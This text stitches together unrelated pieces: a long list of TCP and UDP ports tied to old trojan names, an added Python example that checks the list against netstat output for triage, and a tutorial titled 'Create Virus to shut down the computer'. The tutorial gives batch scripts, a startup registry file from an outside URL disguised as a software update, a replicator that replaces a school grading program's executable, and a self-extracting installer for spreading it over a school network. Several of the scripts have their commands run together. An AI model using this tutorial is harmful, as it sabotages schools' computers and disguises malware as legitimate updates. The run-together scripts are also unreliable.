TCP 6796 SubSeven.214
TCP 6912 ShitHeep.100
TCP 6939 Indoctrination.100
TCP 6953 Lithium.100
TCP 6969 2000Cracks.100, Bigorna.100, Danton.110, Danton.210, Danton.220, Danton.310, Danton.320, Danton.330, GateCrasher.110, NetController.108, Sparta.110, VagrNocker.120
TCP 6970 Danton.330
TCP 7001 Freak88.100
TCP 7119 Massaker.100
TCP 7200 Massaker.110
TCP 7300 Coced.221
TCP 7301 Coced.221
TCP 7306 NetSpy.200, NetSpy.200
TCP 7410 Phoenix.190, Phoenix.200
TCP 7511 Genue.100
TCP 7609 Snid.120, Snid.212
TCP 7614 Wollf.130
TCP 7648 BlackStar.100, Ghost.230
TCP 7788 Last.2000, Matrix.200
TCP 7826 MiniOblivion.010, Oblivion.010
TCP 7887 SmallFun.110
TCP 7891 Revenger.100
TCP 7979 VagrNocker.200
TCP 7997 VagrNocker.200
TCP 8000 XConsole.100
TCP 8011 Way.240
TCP 8012 Ptakks.215, Ptakks.217
TCP 8110 LoseLove.100
TCP 8111 LoseLove.100
TCP 8301 LoseLove.100
TCP 8302 LoseLove.100
TCP 8372 NetBoy.100
TCP 8720 Connection.130
TCP 8734 AutoSpy.110
TCP 8811 Force.155
TCP 8899 Last.2000
TCP 9000 Aristotles.100
TCP 9301 LoseLove.100
TCP 9400 InCommand.100, InCommand.110, InCommand.120, InCommand.130, InCommand.140, InCommand.150, InCommand.153, InCommand.160, InCommand.167, InCommand.170
TCP 9401 InCommand.100, InCommand.110, InCommand.170
TCP 9402 InCommand.100, InCommand.110
TCP 9561 CRatPro.110
TCP 9563 CRatPro.110
TCP 9580 TheefLE.100
TCP 9696 Danton.210, Ghost.230
TCP 9697 Danton.320, Danton.330, Ghost.230
TCP 9870 R3C.100
TCP 9872 PortalOfDoom.100
TCP 9873 PortalOfDoom.100
TCP 9874 PortalOfDoom.100
TCP 9875 PortalOfDoom.100
TCP 9876 Rux.100, SheepGoat.100
TCP 9877 SmallBigBrother.020
TCP 9878 SmallBigBrother.020, TransmissionScout.100, TransmissionScout.110, TransmissionScout.120
TCP 9879 SmallBigBrother.020
TCP 9999 ForcedEntry.100, Infra.100, Prayer.120, Prayer.130, TakeOver.200, TakeOver.300
TCP 10001 DTr.130, DTr.140
TCP 10013 Amanda.200
TCP 10067 PortalOfDoom.100
TCP 10100 Gift.240
TCP 10101 NewSilencer.100
TCP 10167 PortalOfDoom.100
TCP 10528 HostControl.100, HostControl.260
TCP 10607 Coma.109
TCP 10666 Ambush.100
TCP 11011 Amanda.200
TCP 11050 HostControl.101
TCP 11051 HostControl.100, HostControl.260
TCP 11223 AntiNuke.100, Progenic.100, Progenic.110
TCP 11225 Cyn.100, Cyn.103, Cyn.120
TCP 11306 Noknok.800, Noknok.820
TCP 11831 Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 11991 PitfallSurprise.100
TCP 12043 Frenzy.2000
TCP 12345 Fade.100, Netbus.160, Netbus.170, VagrNocker.400
TCP 12346 Netbus.160, Netbus.170
TCP 12348 Bionet.210, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.316, Bionet.317
TCP 12349 Bionet.084, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.314, Bionet.316, Bionet.317, Bionet.401, Bionet.402
TCP 12389 KheSanh.210
TCP 12478 Bionet.210
TCP 12623 Buttman.090, Buttman.100
TCP 12624 Buttman.090, Buttman.100
TCP 12625 Buttman.100
TCP 12904 Akropolis.100, Rocks.100
TCP 13473 Chupacabra.100
TCP 13753 AFTP.010
TCP 14100 Eurosol.100
TCP 14194 CyberSpy.840
TCP 14286 HellDriver.100
TCP 14500 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14501 PCInvader.060, PCInvader.070
TCP 14502 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14503 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14504 PCInvader.050, PCInvader.060
TCP 15092 HostControl.100, HostControl.260
TCP 15382 SubZero.100
TCP 15432 Cyn.210
TCP 15555 ICMIBC.100
TCP 16322 LastDoor.100
TCP 16484 MoSucker.110
TCP 16661 Dfch.010
TCP 16969 Progenic.100
TCP 16982 AcidShiver.100
TCP 17300 Kuang.200
TCP 17499 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17500 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17569 Infector.141, Infector.160, Infector.170, Infector.180, Infector.190, Infector.200, Intruder.100
TCP 17593 AudioDoor.120
TCP 19191 BlueFire.035, BlueFire.041
TCP 19604 Metal.270
TCP 19605 Metal.270
TCP 19991 Dfch.010
TCP 20000 Millenium.100
TCP 20001 Millenium.100, PshychoFiles.180
TCP 20002 AcidKor.100, PshychoFiles.180
TCP 20005 MoSucker.200, MoSucker.210, MoSucker.220
TCP 21212 Schwindler.182
TCP 21554 Exploiter.100, Exploiter.110, Girlfriend.130, GirlFriend.135
TCP 21579 Breach.2001
TCP 21584 Breach.2001
TCP 21684 Intruse.134
TCP 22068 AcidShiver.110
TCP 22115 Cyn.120
TCP 22222 Prosiak.047, Ruler.141, Rux.300, Rux.400, Rux.500, Rux.600
TCP 22223 Rux.400, Rux.500, Rux.600
TCP 22456 Bla.200, Bla.503
TCP 22457 AcidShiver.120, Bla.200, Bla.503
TCP 22784 Intruzzo.110
TCP 22845 Breach.450
TCP 22847 Breach.450
TCP 23005 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23006 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23032 Amanda.200
TCP 23432 Asylum.010, Asylum.012, Asylum.013, Asylum.014, MiniAsylum.110
TCP 23456 EvilFTP.100, VagrNocker.400
TCP 23476 DonaldDick.153, DonaldDick.154, DonaldDick.155
TCP 23477 DonaldDick.153
TCP 24000 Infector.170
TCP 24307 Wildek.020
TCP 25386 MoonPie.220
TCP 25486 MoonPie.220
TCP 25555 FreddyK.100, FreddyK.200
TCP 25556 FreddyK.100
TCP 25685 MoonPie.010, MoonPie.012, MoonPie.130, MoonPie.220, MoonPie.240, MoonPie.400
TCP 25686 MoonPie.135, MoonPie.200, MoonPie.400
TCP 25982 MoonPie.135, MoonPie.200
TCP 26274 Delta.050
TCP 27160 MoonPie.135, MoonPie.200
TCP 27184 Alvgus.100, Alvgus.800
TCP 27374 Muerte.110, Subseven.210, SubSeven.213
TCP 28429 Hack'a'Tack.2000
TCP 28430 Hack'a'Tack.2000
TCP 28431 Hack'a'Tack.2000
TCP 28432 Hack'a'Tack.2000
TCP 28433 Hack'a'Tack.2000
TCP 28434 Hack'a'Tack.2000
TCP 28435 Hack'a'Tack.2000
TCP 28436 Hack'a'Tack.2000
TCP 29559 DuckToy.100, DuckToy.101, Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 29891 Unexplained.100
TCP 30000 Infector.170
TCP 30001 Error32.100
TCP 30003 LamersDeath.100
TCP 30029 AOLTrojan.110
TCP 30100 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30101 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30102 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30103 NetSphere.131
TCP 30947 Intruse.134
TCP 31320 LittleWitch.400, LittleWitch.420
TCP 31337 BackOrifice.120, Khaled.100, OPC.200
TCP 31415 Lithium.101
TCP 31416 Lithium.100, Lithium.101
TCP 31557 Xanadu.110
TCP 31631 CleptoManicos.100
TCP 31745 Buschtrommel.100, Buschtrommel.122
TCP 31785 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31787 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31789 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31791 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31887 BDDT.100
TCP 31889 BDDT.100
TCP 32100 ProjectNext.053
TCP 32418 AcidBattery.100
TCP 32791 Akropolis.100, Rocks.100
TCP 33291 RemoteHak.001
TCP 33333 Blackharaz.100, Prosiak.047, SubSeven.214
TCP 33577 SonOfPsychward.020
TCP 34324 TelnetServer.100
TCP 34763 Infector.180, Infector.190, Infector.200
TCP 35000 Infector.190, Infector.200
TCP 35600 Subsari.140
TCP 36794 BugBear.100
TCP 37237 Mantis.020
TCP 37651 YAT.210
TCP 37653 YAT.310
TCP 40308 Subsari.140
TCP 40412 TheSpy.100
TCP 40421 MastersParadise.970
TCP 40422 MastersParadise.970
TCP 40999 DiemsMutter.110, DiemsMutter.140
TCP 41626 Shah.100
TCP 44444 Prosiak.070
TCP 45673 Akropolis.100, Rocks.100
TCP 47262 Delta.050
TCP 48006 Fragglerock.200
TCP 49683 HolzPferd.210
TCP 50000 Infector.180
TCP 50130 Enterprise.100
TCP 50766 Fore.100
TCP 51234 Cyn.210
TCP 51966 Cafeini.080, Cafeini.110
TCP 54321 PCInvader.010
TCP 57341 NetRaider.100
TCP 57922 Bionet.084
TCP 58008 Tron.100
TCP 58009 Tron.100
TCP 59090 AcidReign.200
TCP 59211 DuckToy.100, DuckToy.101
TCP 59345 NewFuture.100
TCP 60000 DeepThroat.300, MiniBacklash.100, MiniBacklash.101
TCP 60411 Connection.100, Connection.130
TCP 60412 Connection.130
TCP 60552 RoxRat.100
TCP 63536 InsaneNetwork.500
TCP 63878 AphexFTP.100
TCP 63879 AphexFTP.100
TCP 64969 Lithium.100
TCP 65000 Socket.100
UDP 1 SocketsDeTroie.250
UDP 666 Bla.200, Bla.400, Bla.503, Noknok.820
UDP 1130 Noknok.800, Noknok.820
UDP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
UDP 2989 Rat.200
UDP 3128 MastersParadise.970
UDP 3129 MastersParadise.920, MastersParadise.970
UDP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
UDP 3333 Daodan.123
UDP 3800 Eclypse.100
UDP 3996 RemoteAnything.364
UDP 4000 RemoteAnything.364
UDP 5555 Daodan.123
UDP 5881 Y3KRat.110, Y3KRat.140
UDP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
UDP 5883 Y3KRat.110, Y3KRat.140
UDP 5884 Y3KRat.140, Y3KRat.150
UDP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5886 Y3KRat.120, Y3KRat.140
UDP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.150
UDP 6953 Lithium.100
UDP 8012 Ptakks.217
UDP 10067 PortalOfDoom.100
UDP 10167 PortalOfDoom.100
UDP 10666 Ambush.100
UDP 11225 Cyn.100, Cyn.103, Cyn.120
UDP 11306 Noknok.800, Noknok.820
UDP 12389 KheSanh.210
UDP 12623 Buttman.090, Buttman.100
UDP 12625 Buttman.100
UDP 14100 Eurosol.100
UDP 23476 DonaldDick.155
UDP 26274 Delta.050
UDP 27184 Alvgus.100
UDP 28431 Hack'a'Tack.2000
UDP 28432 Hack'a'Tack.2000
UDP 28433 Hack'a'Tack.2000
UDP 28434 Hack'a'Tack.2000
UDP 28435 Hack'a'Tack.2000
UDP 28436 Hack'a'Tack.2000
UDP 29891 Unexplained.100
UDP 30103 NetSphere.131
UDP 31320 LittleWitch.400, LittleWitch.420
UDP 31337 BackOrifice.120, OPC.200
UDP 31416 Lithium.100, Lithium.101
UDP 31789 Hack'a'Tack.100, Hack'a'Tack.112
UDP 31791 Hack'a'Tack.100, Hack'a'Tack.112
UDP 33333 Blackharaz.100
UDP 47262 Delta.050
UDP 49683 HolzPferd.210
UDP 60000 MiniBacklash.100
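
A list like this is mainly useful for triage: compare it with the sockets a machine is actually listening on. The following is an added example, not part of the original page. It parses lines in the list's "PROTO PORT Name.version, ..." format and checks them against `netstat -ano` output. The netstat sample is constructed and the function names are hypothetical.

```python
import re

# Four lines copied from the list above, in its own format.
PORT_LIST = """\
TCP 12345 Fade.100, Netbus.160, Netbus.170, VagrNocker.400
TCP 27374 Muerte.110, Subseven.210, SubSeven.213
TCP 31337 BackOrifice.120, Khaled.100, OPC.200
UDP 31337 BackOrifice.120, OPC.200
"""

# Constructed `netstat -ano` output (Windows layout); addresses and PIDs are made up.
NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING       4312
  TCP    192.168.1.20:49712     203.0.113.7:31337      ESTABLISHED     2208
  TCP    [::]:27374             [::]:0                 LISTENING       5120
  UDP    0.0.0.0:31337          *:*                                    5120
"""

def parse_port_list(text):
    """Map (proto, port) -> list of names, duplicates dropped, order kept."""
    table = {}
    for line in text.splitlines():
        m = re.match(r"\s*(TCP|UDP)\s+(\d{1,5})\s+(.+)$", line)
        if not m:
            continue
        names = [n.strip() for n in m.group(3).split(",") if n.strip()]
        entry = table.setdefault((m.group(1), int(m.group(2))), [])
        entry.extend(n for n in dict.fromkeys(names) if n not in entry)
    return table

def local_listeners(netstat_text):
    """Yield (proto, local_port, pid) for TCP LISTENING rows and bound UDP sockets."""
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) < 4 or f[0] not in ("TCP", "UDP"):
            continue
        if f[0] == "TCP" and f[3] != "LISTENING":
            continue  # established rows: a listed *remote* port is not a local listener
        port = f[1].rsplit(":", 1)[1]  # rsplit also handles [::]:port
        if port.isdigit() and f[-1].isdigit():
            yield f[0], int(port), int(f[-1])

def flag_listeners(port_text, netstat_text):
    """Return (proto, port, pid, names) for each local listener found in the list."""
    table = parse_port_list(port_text)
    return [(proto, port, pid, table[(proto, port)])
            for proto, port, pid in local_listeners(netstat_text)
            if (proto, port) in table]
```

A match is only a lead, since several ports in the list are also used by ordinary software; look up the owning process for the reported PID (for example with `tasklist`) before drawing a conclusion.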




Create Virus to shut down the computer!!! 

There are two methods of doing this:

1. Go to Start Menu > Run and type CMD (Command Prompt). When the command prompt opens, type "shutdown -a". This prevents the shutdown.

2. Open Notepad, then write
"shutdown -s -t 0"
0 = this is for shut down in 0 seconds
(t = time, s = shutdown)

And if you want to restart instead, use this:
shutdown -r -t 0
0 = same, but this is for restarting the computer in 0 seconds.
(only for Windows XP)

Shut down your School!!

By using this command you can shutdown your school or college by using only Note pad.

This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
"You have been hacked!"
Save this as shutdown.bat, making sure you choose all files as the filetype.


Step 2
Make it run on Startup

The file you need can be downloaded here: http://www.mutantsrus.com/Update.reg

This is just a simple registry file that anyone can create, but I don't feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.


Step 3
Set up the replication system

Here is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?, $, and ! mean that it varies. It depends on what program you are using. To find out how to fill in these blanks, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.

Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti

Here is the code:


@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit

Save this as global.bat


Step 4
They grow up so fast -- real fast!

This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user's hard drive and remain there.


@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.



Step 5
The Cure

This is a little tool that can fix all damage done by your virus. It works in the same way that the virus works, but works to correct the problem rather than create it.

@echo off
shutdown -a
cd C:\WINDOWS
del shutdown.bat

Save as cure.bat

@echo off
cd ?:\$
del !.exe
cd C:\
move ?:\$\real.exe
ren C:\real.exe !.exe
cd ?:\$
move C:\?.exe
cd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe

Step 6
The Setup

No, it's not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive. I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to "tools", then select "convert archive to SFX". Click "Advanced SFX Options". In the field labeled Path to Extract, type C:\WINDOWS. In the field labeled Run After Extraction, type C:\WINDOWS\global.bat. Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)
